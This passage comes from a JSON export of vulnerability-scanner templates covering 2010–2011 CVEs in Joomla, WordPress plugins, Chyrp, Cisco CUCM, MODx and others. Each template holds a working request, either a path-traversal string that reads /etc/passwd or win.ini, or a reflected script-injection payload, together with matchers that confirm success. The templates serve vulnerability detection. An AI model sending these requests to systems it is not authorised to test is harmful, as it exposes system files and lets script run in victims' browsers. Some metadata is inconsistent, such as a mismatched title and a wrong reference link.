490a004630440220090ace41aa0b7a63b491ff1b35ea977e018fd5f7ac4e5bebe586d7c925dab5ef0220211b310be5c582ef6ae23ddaeb61459599b65fb35f6b0ea543195a0f7cdf0a93:922c64590222798bb761d5b6d8e72950", "hash": "1e79b0deef5222d9839c8b0e5bf4dcfe", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ed1" }, "name": "CVE-2010-5028.yaml", "content": "id: CVE-2010-5028\n\ninfo:\n name: Joomla! Component JE Job 1.0 - Local File Inclusion\n author: daffainfo\n severity: high\n description: A SQL injection vulnerability in the JExtensions JE Job (com_jejob) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the catid parameter in an item action to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12601\n - https://nvd.nist.gov/vuln/detail/CVE-2010-5028\n - http://www.vupen.com/english/advisories/2010/1269\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/58599\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-5028\n cwe-id: CWE-89\n epss-score: 0.00316\n epss-percentile: 0.67285\n cpe: cpe:2.3:a:harmistechnology:com_jejob:1.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: harmistechnology\n product: com_jejob\n tags: cve,cve2010,joomla,lfi,edb,harmistechnology,sqli\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_jejob&view=../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100df2b627845f4cfe972f4569690174ffe89b4221f5be16d0a6cb676e29ce2b84202203a4014cdc61ccefa25815adf442d68757eb46d7c0dbe703bf8b7d1739538f26a:922c64590222798bb761d5b6d8e72950", "hash": "c4e239ece99809e4f9bf8495a0072d90", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ed2" }, "name": "CVE-2010-5278.yaml", "content": "id: CVE-2010-5278\n\ninfo:\n name: MODx manager - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl and possibly earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter when magic_quotes_gpc is disabled.\n impact: |\n An attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to unauthorized access or sensitive information disclosure.\n remediation: |\n Apply the latest patches and updates provided by MODx to fix the LFI vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/34788\n - https://nvd.nist.gov/vuln/detail/CVE-2010-5278\n - http://packetstormsecurity.org/1009-exploits/modx202pl-lfi.txt\n - http://modxcms.com/forums/index.php/topic,55104.0.html\n - http://modxcms.com/forums/index.php/topic,55105.msg317273.html\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N\n cvss-score: 4.3\n cve-id: CVE-2010-5278\n cwe-id: CWE-22\n epss-score: 0.06122\n epss-percentile: 0.93381\n cpe: cpe:2.3:a:modx:modx_revolution:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: modx\n product: modx_revolution\n tags: cve,cve2010,lfi,edb,packetstorm,modx\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"bit app support\"\n - \"fonts\"\n - \"extensions\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450221008e76f7a4d677f1d7ef95c2948ec7ed1373b61aaf7d8079dee4d600ee0124e6a80220414a9a52b2fc1f231283eec54414a71ccd7fddfadfdfd55c76cddaa64c4d10f5:922c64590222798bb761d5b6d8e72950", "hash": "96d4c954b10103e00e48d818a1a629c3", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ed3" }, "name": "CVE-2010-5286.yaml", "content": "id: CVE-2010-5286\n\ninfo:\n name: Joomla! Component Jstore - 'Controller' Local File Inclusion\n author: daffainfo\n severity: critical\n description: A directory traversal vulnerability in Jstore (com_jstore) component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Arbitrary file inclusion leading to remote code execution\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/34837\n - https://nvd.nist.gov/vuln/detail/CVE-2010-5286\n - http://packetstormsecurity.org/1010-exploits/joomlajstore-lfi.txt\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C\n cvss-score: 10\n cve-id: CVE-2010-5286\n cwe-id: CWE-22\n epss-score: 0.07071\n epss-percentile: 0.93832\n cpe: cpe:2.3:a:joobi:com_jstore:-:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: joobi\n product: com_jstore\n tags: cve2010,cve,joomla,lfi,edb,packetstorm,joobi\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_jstore&controller=./../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402203fb561e1ab44aaeb747e0238060527aad3bc02b20463ff0f288bc3d2ae95c3ff022062cf30b18e1bd5e1990e6fc55e60e0752092d76ff94a15f6061a6f373e4c3945:922c64590222798bb761d5b6d8e72950", "hash": "f44de64b2740b5d3b2592a6e120f7f91", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ed4" }, "name": "CVE-2011-0049.yaml", "content": "id: CVE-2011-0049\n\ninfo:\n name: Majordomo2 - SMTP/HTTP Directory Traversal\n author: pikpikcu\n severity: medium\n description: A directory traversal vulnerability in the _list_file_get function in lib/Majordomo.pm in Majordomo 2 before 20110131 allows remote attackers to read arbitrary files via .. (dot dot) sequences in the help command, as demonstrated using (1) a crafted email and (2) cgi-bin/mj_wwwusr in the web interface.\n impact: |\n This vulnerability can lead to unauthorized access to sensitive files and data on the server.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/16103\n - https://nvd.nist.gov/vuln/detail/CVE-2011-0063\n - http://www.kb.cert.org/vuls/id/363726\n - https://bug628064.bugzilla.mozilla.org/attachment.cgi?id=506481\n - http://securityreason.com/securityalert/8061\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2011-0049\n cwe-id: CWE-22\n epss-score: 0.96615\n epss-percentile: 0.99548\n cpe: cpe:2.3:a:mj2:majordomo_2:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: mj2\n product: majordomo_2\n tags: cve,cve2011,majordomo2,lfi,edb,mj2\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502200847c0a8d121afe8c41b188ad79df89989aaa8406806a47fe74f2d39e80ff3f0022100de97a86b56c22a25c27f8f4e127d9529cb5d44d6e0cd37714be04e1ec1e30997:922c64590222798bb761d5b6d8e72950", "hash": "1c1ebf817fd0bbc5402c3ba5f00f02d2", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ed5" }, "name": "CVE-2011-1669.yaml", "content": "id: CVE-2011-1669\n\ninfo:\n name: WP Custom Pages 0.5.0.1 - Local File Inclusion (LFI)\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in wp-download.php in the WP Custom Pages module 0.5.0.1 for WordPress allows remote attackers to read arbitrary files via ..%2F (encoded dot dot) sequences in the url parameter.\n impact: |\n An attacker can read arbitrary files on the server, potentially leading to unauthorized access to sensitive information.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1669\n - https://www.exploit-db.com/exploits/17119\n - http://www.exploit-db.com/exploits/17119\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/66559\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2011-1669\n cwe-id: CWE-22\n epss-score: 0.02966\n epss-percentile: 0.89875\n cpe: cpe:2.3:a:mikoviny:wp_custom_pages:0.5.0.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: mikoviny\n product: wp_custom_pages\n google-query: inurl:\"/wp-content/plugins/wp-custom-pages/\"\n tags: cve,cve2011,edb,wordpress,wp-plugin,lfi,mikoviny\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220494970bc2de72594ab8da27efeb9427a0eba928ba7e49b4eb191b682bda14ad1022100905b334c25e0b7169d2adbb77e2f68f49d388a46f12a9a13291a7e5a035fe981:922c64590222798bb761d5b6d8e72950", "hash": "7a4e5ecfcd102760aed9cae8cbc02a16", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ed6" }, "name": "CVE-2011-2744.yaml", "content": "id: CVE-2011-2744\n\ninfo:\n name: Chyrp 2.x - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in Chyrp 2.1 and earlier allows remote attackers to include and execute arbitrary local files via a ..%2F (encoded dot dot slash) in the action parameter to the default URI.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, remote code execution, or complete compromise of the affected system.\n remediation: |\n Upgrade Chyrp to the latest version or apply the necessary patches provided by the vendor.\n reference:\n - https://www.exploit-db.com/exploits/35945\n - http://www.openwall.com/lists/oss-security/2011/07/13/6\n - https://nvd.nist.gov/vuln/detail/CVE-2011-2744\n - http://securityreason.com/securityalert/8312\n - http://www.ocert.org/advisories/ocert-2011-001.html\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2011-2744\n cwe-id: CWE-22\n epss-score: 0.01541\n epss-percentile: 0.86842\n cpe: cpe:2.3:a:chyrp:chyrp:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: chyrp\n product: chyrp\n tags: cve,cve2011,lfi,chyrp,edb\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220754b4ba2abae3c78a2e9e383db1f8a5610313a788aa30bae90556556e31a85d20221009bd64e51d469c11e836eb02211169a9efd4322295b411e2a9afe0f9efa702fa4:922c64590222798bb761d5b6d8e72950", "hash": "63302fec2c9059f2304ee133a59992c0", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ed7" }, "name": "CVE-2011-2780.yaml", "content": "id: CVE-2011-2780\n\ninfo:\n name: Chyrp 2.x - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in includes/lib/gz.php in Chyrp 2.0 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter, a different vulnerability than CVE-2011-2744.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - http://www.justanotherhacker.com/advisories/JAHx113.txt\n - http://www.openwall.com/lists/oss-security/2011/07/13/5\n - http://www.ocert.org/advisories/ocert-2011-001.html\n - http://www.openwall.com/lists/oss-security/2011/07/13/6\n - http://securityreason.com/securityalert/8312\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/68565\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2011-2780\n cwe-id: CWE-22\n epss-score: 0.03327\n epss-percentile: 0.91127\n cpe: cpe:2.3:a:chyrp:chyrp:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: chyrp\n product: chyrp\n tags: cve,cve2011,lfi,chyrp\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/includes/lib/gz.php?file=/themes/../../../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100ab3340adb074a840c8283299b9fac09e4325d3a44d167aa3ac9d2827d14d49bd022100beb78853f6c850bc5953e75678cbccdce68edc349f14b91a45ad79f2eff254cb:922c64590222798bb761d5b6d8e72950", "hash": "bb5f890f40d2d8912e653670bc852494", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ed8" }, "name": "CVE-2011-3315.yaml", "content": "id: CVE-2011-3315\n\ninfo:\n name: Cisco CUCM, UCCX, and Unified IP-IVR- Directory Traversal\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in Cisco Unified Communications Manager (CUCM) 5.x and 6.x before 6.1(5)SU2, 7.x before 7.1(5b)SU2, and 8.x before 8.0(3), and Cisco Unified Contact Center Express (aka Unified CCX or UCCX) and Cisco Unified IP Interactive Voice Response (Unified IP-IVR) before 6.0(1)SR1ES8, 7.0(x) before 7.0(2)ES1, 8.0(x) through 8.0(2)SU3, and 8.5(x) before 8.5(1)SU2, allows remote attackers to read arbitrary files via a crafted URL, aka Bug IDs CSCth09343 and CSCts44049.\n impact: |\n An attacker can exploit this vulnerability to access sensitive files and directories on the affected system.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/36256\n - http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20111026-uccx\n - http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20111026-cucm\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:N/A:N\n cvss-score: 7.8\n cve-id: CVE-2011-3315\n cwe-id: CWE-22\n epss-score: 0.72021\n epss-percentile: 0.97988\n cpe: cpe:2.3:h:cisco:unified_ip_interactive_voice_response:-:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: cisco\n product: unified_ip_interactive_voice_response\n tags: cve,cve2011,lfi,cisco,edb\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402203755f7c63e99d436630a8407a862c05b9ba15cc8afbe6ff69938ced0202577080220564c8d53df44ef235f4749d857dba8cc0317888378371e240f8aa04dc6b306fb:922c64590222798bb761d5b6d8e72950", "hash": "c78c1547f97ea2c2e53cd80bc3d98ce8", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ed9" }, "name": "CVE-2011-4336.yaml", "content": "id: CVE-2011-4336\n\ninfo:\n name: Tiki Wiki CMS Groupware 7.0 Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: Tiki Wiki CMS Groupware 7.0 is vulnerable to cross-site scripting via the GET \"ajax\" parameter to snarf_ajax.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2011-4336\n - https://seclists.org/bugtraq/2011/Nov/140\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2011-4336\n cwe-id: CWE-79\n epss-score: 0.00255\n epss-percentile: 0.64746\n cpe: cpe:2.3:a:tiki:tikiwiki_cms\\/groupware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: tiki\n product: tikiwiki_cms\\/groupware\n tags: cve,cve2011,seclists,xss,tikiwiki,tiki\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/snarf_ajax.php?url=1&ajax=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100cfd21e5afe0cd33f196e0f14cec829fe42b3b88a61c23a61a2615a34e01d4e6e022100899521b740fb94ec3a62f4001cafe59c17f13519b686323a2cb449a0265b4ad6:922c64590222798bb761d5b6d8e72950", "hash": "7876cff262fa23fe77a519079908e09b", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307eda" }, "name": "CVE-2011-4618.yaml", "content": "id: CVE-2011-4618\n\ninfo:\n name: Advanced Text Widget < 2.0.2 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: A cross-site scripting (XSS) vulnerability in advancedtext.php in Advanced Text Widget plugin before 2.0.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.\n impact: |\n Allows remote attackers to execute arbitrary script or HTML code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2011-4618\n - http://wordpress.org/support/topic/wordpress-advanced-text-widget-plugin-cross-site-scripting-vulnerabilities\n - http://wordpress.org/extend/plugins/advanced-text-widget/changelog/\n - http://www.openwall.com/lists/oss-security/2011/12/19/6\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/71412\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2011-4618\n cwe-id: CWE-79\n epss-score: 0.01913\n epss-percentile: 0.88293\n cpe: cpe:2.3:a:simplerealtytheme:advanced_text_widget_plugin:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: simplerealtytheme\n product: advanced_text_widget_plugin\n google-query: inurl:\"/wp-content/plugins/advanced-text-widget\"\n tags: cve2011,cve,wordpress,xss,wp-plugin,simplerealtytheme\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/advanced-text-widget/readme.txt HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/advanced-text-widget/advancedtext.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \"\")'\n - 'contains(body_1, \"Advanced Text Widget\")'\n condition: and\n# digest: 4a0a0047304502200ae7d2b1eaa9716f2c9ca499a4059d499dc71155612efd70b3ff9ed1f9ab3a51022100a4febc922fbd52c77d48d4cfe79db3c53258501b17c1470e31c78df7a8c85308:922c64590222798bb761d5b6d8e72950", "hash": "5e94752b4958413c74b5bf3a5592e32a", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307edb" }, "name": "CVE-2011-4624.yaml", "content": "id: CVE-2011-4624\n\ninfo:\n name: GRAND FlAGallery 1.57 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: A cross-site scripting (XSS) vulnerability in facebook.php in the GRAND FlAGallery plugin (flash-album-gallery) before 1.57 for WordPress allows remote attackers to inject arbitrary web script or HTML via the i parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2011-4624\n - http://www.openwall.com/lists/oss-security/2011/12/23/2\n - http://plugins.trac.wordpress.org/changeset/469785\n - http://wordpress.org/extend/plugins/flash-album-gallery/changelog/\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2011-4624\n cwe-id: CWE-79\n epss-score: 0.00431\n epss-percentile: 0.74018\n cpe: cpe:2.3:a:codeasily:grand_flagallery:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: codeasily\n product: grand_flagallery\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/flash-album-gallery\"\n tags: cve,cve2011,wordpress,xss,wp-plugin,codeasily\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/flash-album-gallery/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Grand Flagallery'\n\n - method: GET\n path:\n - '{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022003c68f4509b734115cf058165538efe2647798f41c8ab2529c8a37ac87adf97502207f242403d316394c9ba49f4394fec2656568c19d07c6d98ce47089acb541779e:922c64590222798bb761d5b6d8e72950", "hash": "dab3553ed665e7a1fee03c911be75432", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307edc" }, "name": "CVE-2011-4640.yaml", "content": "id: CVE-2011-4640\n\ninfo:\n name: WebTitan < 3.60 - Local File Inclusion\n author: ctflearner\n severity: medium\n description: |\n Directory traversal vulnerability in logs-x.php in SpamTitan WebTitan before 3.60 allows remote authenticated users to read arbitrary files via a .. (dot dot) in the fname parameter in a view action.\n reference:\n - https://www.exploit-db.com/exploits/37943\n - https://nvd.nist.gov/vuln/detail/CVE-2011-4640\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:S/C:P/I:N/A:N\n cvss-score: 4\n cve-id: CVE-2011-4640\n cwe-id: CWE-22\n cpe: cpe:2.3:a:spamtitan:spamtitan:*:*:*:*:*:*:*:*\n metadata:\n max-request: 3\n product: spamtitan\n vendor: spamtitan\n shodan-query: title:\"WebTitan\"\n tags: cve,cve2011,lfi,spamtitan,webtitan,authenticated\n\nhttp:\n - raw:\n - |\n GET /login-x.php HTTP/1.1\n Host: {{Hostname}}\n\n - |\n POST /login-x.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n X-Requested-With: XMLHttpRequest\n\n jaction=login&language=en_US&username={{username}}&password={{password}}\n\n - |\n GET /logs-x.php?jaction=view&fname=../../../../../etc/passwd HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'contains(body_2, \"success\\\":true\")'\n - 'contains(body_1, \"WebTitan\")'\n - \"regex('root:.*:0:0:', body)\"\n - 'status_code_3 == 200'\n condition: and\n# digest: 490a00463044022003bcdf3fd8c489c4c9eb2586491ed5595a9125404ba12366de7a36e801f261ac02200c78ce5a21dff8fd612356d665f441024b862909f23324c8b5ac220196e23ba4:922c64590222798bb761d5b6d8e72950", "hash": "2bd88528ed9be059da1ecd5cd088d30c", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307edd" }, "name": "CVE-2011-4804.yaml", "content": "id: CVE-2011-4804\n\ninfo:\n name: Joomla! Component com_kp - 'Controller' Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the obSuggest (com_obsuggest) component before 1.8 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n The vulnerability allows an attacker to include arbitrary local files, leading to unauthorized access to sensitive information or remote code execution.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/36598\n - https://nvd.nist.gov/vuln/detail/CVE-2011-4804\n - http://foobla.com/news/latest/obsuggest-1.8-security-release.html\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2011-4804\n cwe-id: CWE-22\n epss-score: 0.0358\n epss-percentile: 0.9073\n cpe: cpe:2.3:a:foobla:com_obsuggest:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: foobla\n product: com_obsuggest\n tags: cve,cve2011,lfi,edb,joomla,foobla\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_kp&controller=../../../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100f5fc8a3ec653d8fb8742134fb6a023a25f0175d8689169686dd9d21181140f0c022100b6b7a735dbecdd4eae6ec785a7a430ca8bc71649f26f8690f71819f2c3f9e3c8:922c64590222798bb761d5b6d8e72950", "hash": "beaa8977d8a337014fa70b5137d98e46", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ede" }, "name": "CVE-2011-4926.yaml", "content": "id: CVE-2011-4926\n\ninfo:\n name: Adminimize 1.7.22 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: A cross-site scripting vulnerability in adminimize/adminimize_page.php in the Adminimize plugin before 1.7.22 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.\n impact: |\n Allows attackers to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.\n remediation: |\n Update to the latest version of Adminimize plugin (1.7.22) or apply the necessary patches to fix the XSS vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2011-4926\n - https://www.whitesourcesoftware.com/vulnerability-database/CVE-2011-4926\n - http://plugins.trac.wordpress.org/changeset?reponame=&new=467338@adminimize&old=466900@adminimize#file5\n - http://www.openwall.com/lists/oss-security/2012/01/10/9\n - http://wordpress.org/extend/plugins/adminimize/changelog/\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2011-4926\n cwe-id: CWE-79\n epss-score: 0.01792\n epss-percentile: 0.86796\n cpe: cpe:2.3:a:bueltge:adminimize:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: bueltge\n product: adminimize\n google-query: inurl:\"/wp-content/plugins/adminimize/\"\n tags: cve2011,cve,wordpress,xss,wp-plugin,bueltge\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/adminimize/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Adminimize ==='\n\n - method: GET\n path:\n - '{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220059bc7b527414cb8f06e01a058360c21c69b8e26a37af1fc52f6b1d9806c894d022037ddaae6a037f21efaba06fccd5dda6df213960c66b2bbb410e35cb137d415c0:922c64590222798bb761d5b6d8e72950", "hash": "c3a62e0a2cd15c11febf4d6c6b7a22b0", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307edf" }, "name": "CVE-2011-5106.yaml", "content": "id: CVE-2011-5106\n\ninfo:\n name: WordPress Plugin Flexible Custom Post Type < 0.1.7 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: A cross-site scripting vulnerability in edit-post.php in the Flexible Custom Post Type plugin before 0.1.7 for WordPress allows remote attackers to inject arbitrary web script or HTML via the id parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.\n remediation: |\n Update to the latest version of the plugin (version 0.1.8 or higher) which includes a fix for this vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2011-5106\n - https://wordpress.org/plugins/flexible-custom-post-type/#developers\n - http://plugins.trac.wordpress.org/changeset?reponame=&new=466252%40flexible-custom-post-type&old=465583%40flexible-custom-post-type\n - 